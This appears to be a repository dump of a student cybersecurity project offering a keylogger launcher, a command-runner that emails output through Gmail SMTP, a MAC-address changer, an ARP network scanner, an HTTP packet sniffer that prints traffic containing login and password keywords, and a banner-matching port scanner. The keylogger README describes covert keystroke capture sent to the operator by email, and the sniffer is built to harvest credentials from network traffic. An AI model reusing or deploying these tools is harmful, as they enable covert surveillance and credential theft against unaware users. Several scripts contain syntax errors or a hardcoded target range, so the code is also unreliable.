├── Keylogger ├── Documentation.pdf ├── LICENSE ├── README.md ├── execute_and_report.py └── zlogger.py ├── Macchanger ├── Macchanger.txt └── macchangepy.py ├── Network_scanner ├── Network_scanner_document.docx ├── network_scanner.py └── scanner.txt ├── Packet_Sniffer ├── Documentaion.docx └── packet_sniffer.py ├── README.md └── Vulnerability_Scanner ├── Documentation_vulnerability_scanner.docx ├── portsc.py └── vulnarable_banners.txt /Keylogger/Documentation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phoenix-CS02-Cybersecurity-project/Phoenix-CS02-CyberSecurity_Project/6c0af829b13ec799853b5d255c96c0012fb7138e/Keylogger/Documentation.pdf -------------------------------------------------------------------------------- /Keylogger/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Tarrun 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Keylogger/README.md: -------------------------------------------------------------------------------- 1 | # Keylogger 2 | 3 | Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. 4 | 5 | Data can then be retrieved by the person operating the logging program. 6 | 7 | 8 | # How Keystroke Logging Works 9 | 10 | Keystroke logging is an act of tracking and recording every keystroke entry made on a computer, often without the permission or knowledge of the user. A “keystroke” is just any interaction you make with a button on your keyboard. 11 | 12 | Keystrokes are how you “speak” to your computers. Each keystroke transmits a signal that tells your computer programs what you want them to do. 13 | 14 | These commands may include: 15 | 16 | Length of the keypress 17 | Time of keypress 18 | Velocity of keypress 19 | Name of the key used 20 | 21 | # Keylogger Script 22 | 23 | This script captures keystrokes by executing the python script and sends the email with the keystrokes 24 | 25 | # How it works 26 | 27 | 1) Install Python (latest Version) 28 | 2) Install Python Libraries (Required) 29 | 3) Enter the parameter mentioned in the scripts 30 | 4) Run the keylogger.py script first using the comamnd -> python3 keylogger.py 31 | 5) Execute Zlogger Script using the command -> python3 zlogger.py 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /Keylogger/execute_and_report.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/env python 2 | import subprocess, smtplib 3 | 4 | def send_mail(email, password, message): 5 | server = smtplib.SMTP("smtp.gmail.com", 587) #smtp.gmail.com (GOOGLE SMTP SERVER) at port 587 6 | server.starttls() 7 | server.login(email, password) 8 | server.sendmail(email, email, message) #send mail method from (sender) to (reciever) with a message 9 | server.quit() 10 | 11 | command = " " #Enter the command 12 | result = subprocess.check_output(command) 13 | send_mail("email_address", "password ", result) #Enter email address and password in the defined fields Format(email@gmail.com) -------------------------------------------------------------------------------- /Keylogger/zlogger.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/env python 2 | 3 | import keylogger 4 | 5 | my_keylogger = keylogger.Keylogger(600, "email_address", "password") #Enter the duration to send an email ( in sec ), email address and password of your email_account 6 | my_keylogger.start() 7 | -------------------------------------------------------------------------------- /Macchanger/Macchanger.txt: -------------------------------------------------------------------------------- 1 | Macchanger 2 | Kali linux mac changer python script 3 | 4 | Usage : 5 | 6 | Commands 7 | 8 | python macchangerpy.py --i "interface_name" -m "new_mac address" 9 | 10 | or 11 | 12 | python macchangerpy.py --interface "interface_name" --new_mac "new_mac address" 13 | 14 | example : 15 | 16 | python macchangerpy.py --interface eth0 -m 00:11:22:33:44:55 17 | -------------------------------------------------------------------------------- /Macchanger/macchangepy.py: -------------------------------------------------------------------------------- 1 | #!usr\bin\env python 2 | import subprocess 3 | import optparse 4 | 5 | def change(interface, new_mac): 6 | subprocess.call(["ifconfig", interface, "down"]) 7 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 8 | subprocess.call(["ifconfig", interface, "up"]) 9 | 10 | parser = optparse.OptionParser() 11 | 12 | parser.add_option("-i", "--interface", dest = "interface", help = "INTERFACE TO CHANGE") 13 | parser.add_option("-m","--new_mac", dest = "new_mac", help = "NEW MAC ADDRESS") 14 | 15 | (options, arguments) = parser.parse_args() 16 | 17 | interface = options.interface 18 | new_mac = options.new_mac 19 | 20 | change(interface, new_mac); 21 | 22 | -------------------------------------------------------------------------------- /Network_scanner/Network_scanner_document.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phoenix-CS02-Cybersecurity-project/Phoenix-CS02-CyberSecurity_Project/6c0af829b13ec799853b5d255c96c0012fb7138e/Network_scanner/Network_scanner_document.docx -------------------------------------------------------------------------------- /Network_scanner/network_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import argparse 3 | import scapy.all as scapy 4 | 5 | 6 | def get_arguments(): 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("-t", "--target", dest="target", help="target IP/ IP range") 9 | options = parser.parse_args() 10 | return options 11 | 12 | 13 | def scan(ip): 14 | arp_request = scapy.ARP(pdst=ip) 15 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 16 | arp_request_broadcast = broadcast / arp_request 17 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 18 | 19 | clients_list = [] 20 | for element in answered_list: 21 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 22 | clients_list.append(client_dict) 23 | return clients_list 24 | 25 | 26 | def print_result(results_list): 27 | print("IP\t\t\tMAC Address\n-------------------------------------------") 28 | for client in results_list: 29 | print(client["ip"] + "\t\t" + client["mac"]) 30 | 31 | 32 | options = get_arguments() 33 | scan_result = scan("192.168.48.1/24") 34 | print_result(scan_result) 35 | -------------------------------------------------------------------------------- /Network_scanner/scanner.txt: -------------------------------------------------------------------------------- 1 | # Network_Scanner 2 | 3 | # Steps 4 | 5 | 1. Execute the main.py 6 | 2. command -> sudo python3 main.py --t ip_address 7 | 8 | 9 | Example: 10 | 11 | sudo python3 main.py --t 192.168.74.0/24 12 | default_password: kali 13 | 14 | 15 | # Finding Ip Address: 16 | 17 | command: ipconfig 18 | 19 | eth0 inet 20 | -------------------------------------------------------------------------------- /Packet_Sniffer/Documentaion.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phoenix-CS02-Cybersecurity-project/Phoenix-CS02-CyberSecurity_Project/6c0af829b13ec799853b5d255c96c0012fb7138e/Packet_Sniffer/Documentaion.docx -------------------------------------------------------------------------------- /Packet_Sniffer/packet_sniffer.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/eve python 2 | import scapy.all as scapy 3 | frpom scappy.layers import http 4 | def sniff(interface): 5 | scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) 6 | def process_sniffed_packet(packet): 7 | if packet.haslayer(http.HTTPRequest): 8 | url = packet[HTTPRequest].Host + packet[HTTPRequest].Path 9 | print(url) 10 | 11 | if packet.haslayer(scapy.Raw): 12 | load = packet.[scapy.Raw].load 13 | keywords = ["username", "user", "login", "password", "pass"] 14 | for keyword in keywords: 15 | if keyword in load: 16 | print(load) 17 | break 18 | sniff("eth0") -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Phoenix-CS02-CyberSecurity_Project 2 | -------------------------------------------------------------------------------- /Vulnerability_Scanner/Documentation_vulnerability_scanner.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phoenix-CS02-Cybersecurity-project/Phoenix-CS02-CyberSecurity_Project/6c0af829b13ec799853b5d255c96c0012fb7138e/Vulnerability_Scanner/Documentation_vulnerability_scanner.docx -------------------------------------------------------------------------------- /Vulnerability_Scanner/portsc.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from IPy import IP 3 | import threading 4 | 5 | 6 | ports = [] 7 | banners =[] 8 | 9 | 10 | def port_scanner(target,port): 11 | try: 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.settimeout(5) 14 | try: 15 | trarget_ip =IP(target) 16 | except: 17 | target_ip = socket.gethostbyname(target) 18 | 19 | s.connect((target_ip, port)) 20 | try: 21 | banner_name = banner(s).decode() 22 | ports.append(port) 23 | banners.append(banner_name.strip()) 24 | except: 25 | pass 26 | except: 27 | pass 28 | 29 | def banner(s): 30 | return s.recv(1024) 31 | 32 | target = input("Enter Target IP address, localhost or www.domainname.com : ") 33 | 34 | portsc = int(input("Enter Number of ports to be scanned")) 35 | for port in range(1,portsc): 36 | thread = threading.Thread(target =port_scanner, args=[target,port]) 37 | thread.start() 38 | 39 | with open("vulnarable_banners.txt", "r") as file: 40 | data = file.read() 41 | for i in range(len(banners)): 42 | if banners[i] in data: 43 | print(f"[!]Vulneribility found: {banners[i]} at port {ports[i]}") 44 | -------------------------------------------------------------------------------- /Vulnerability_Scanner/vulnarable_banners.txt: -------------------------------------------------------------------------------- 1 | 3Com 3CDaemon FTP Server Version 2.0 2 | 220-FileZilla Server version 0.9.41 beta 3 | Ability Server 2.34 4 | CCProxy Telnet Service Ready 5 | ESMTP TABS Mail Server for Windows NT 6 | FreeFloat Ftp Server (Version 1.00) 7 | IMAP4rev1 MDaemon 9.6.4 ready 8 | MailEnable Service, Version: 0-1.54 9 | NetDecision-HTTP-Server 1.0 10 | PSO Proxy 0.9 11 | SAMBAR Sami FTP Server 2.0.2 12 | Spipe 1.0 13 | TelSrv 1.5 14 | WDaemon 6.8.5 15 | WinGate 6.1.1 16 | Xitami 17 | YahooPOPs! Simple Mail Transfer Service Ready 18 | metasploitable.localdomain ESMTP Postfix (Ubuntu) 19 | SSH-2.0-dropbear_0.52 20 | vsFTPd 2.3.4 21 | --------------------------------------------------------------------------------